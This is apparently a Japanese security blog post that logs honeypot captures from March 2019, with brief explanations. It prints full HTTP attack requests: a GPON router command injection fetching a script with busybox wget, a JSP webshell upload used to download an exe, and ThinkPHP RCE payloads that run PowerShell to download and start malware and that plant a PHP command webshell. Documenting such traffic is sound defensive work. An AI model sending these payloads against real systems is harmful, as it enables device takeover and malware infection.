2019年3月内でハニーポットで検知したもので個人的に勉強になったものを記載します。

(1)GPONルータの脆弱性悪用 

POST /GponForm/diag_Form?images/ HTTP/1.1

User-Agent: Yakuza/2.0

Accept: */*

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

 

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://x.x.x.x/gpon+-O+/tmp/fwef;sh+/tmp/fwef`&ipv=0

GPONホームルーターを狙った脆弱性です。

UAが Yakuza/2.0とはYakuzaの意味が違う意味でどんどん広がっていっている・・。

https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/

(2)WebShellを使ったマルウェアダウンロード

PUT /FxCodeShell.jsp::$DATA HTTP/1.1

 

GET /FxCodeShell.jsp?view=xxxxxxxxx&os=1&address=http://x.x.x/download.exe HTTP/1.1

Webshellをアップロードさせ、WebShell経由でdownload.exeをダウンロードを試みています。viewパラメータがWebShellにアクセスするためのパスワードになっています。

(3)ThinkPHPの脆弱性を悪用

GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://x.x.x/download.exe','C:/Windows/temp/iiqpccjjmjjpoux8275.exe');start%20C:/Windows/temp/iiqpccjjmjjpoux8275.exe HTTP/1.1

 

GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1

 

GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://x.x.x/download.exe','C:/Windows/temp/iiqpccjjmjjpoux8275.exe');start%20C:/Windows/temp/iiqpccjjmjjpoux8275.exe HTTP/1.1

ThinkPHPのRCE脆弱性を利用して、download.exeをダウンロードさせ、実行させようとしています。PowerShellでダウンロードさせる方法とhydra.phpに出力させてからダウンロードさせる2パターンの攻撃を2連続でやってきました。

https://www.vulneraresearch.com/index.php/2018/12/24/post-16/

(2)と(3)はIPアドレスや時間帯は全然違いますが、同じdownload.exeをDLさせようとしていました。試しにアクセスしてみたところ(Aguse経由で)、まだ存在しているファイルでした。